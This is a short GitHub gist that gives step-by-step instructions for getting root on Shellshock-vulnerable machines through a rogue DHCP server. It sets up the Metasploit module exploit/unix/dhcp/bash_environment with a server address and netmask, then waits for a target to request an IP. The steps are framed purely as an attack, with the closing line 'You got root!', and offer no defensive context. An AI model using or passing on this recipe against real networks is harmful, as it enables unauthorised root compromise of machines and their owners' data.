Skip to content

Instantly share code, notes, and snippets.

@kimsyversen
Last active March 6, 2016 10:02
Show Gist options
  • Save kimsyversen/fec465c2bd3a479be1dd to your computer and use it in GitHub Desktop.
Save kimsyversen/fec465c2bd3a479be1dd to your computer and use it in GitHub Desktop.

#Exploits Get root via DHCP on machines vulnerable to Shellshock. Source. https://d.uijn.nl/?p=32

  1. Start Metasploit:
use exploit/unix/dhcp/bash_environment
set SRVHOST 192.168.1.1
set netmask 255.255.255.0
  1. Wait for the pc to boot / ask for new ip
  2. You got root!
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment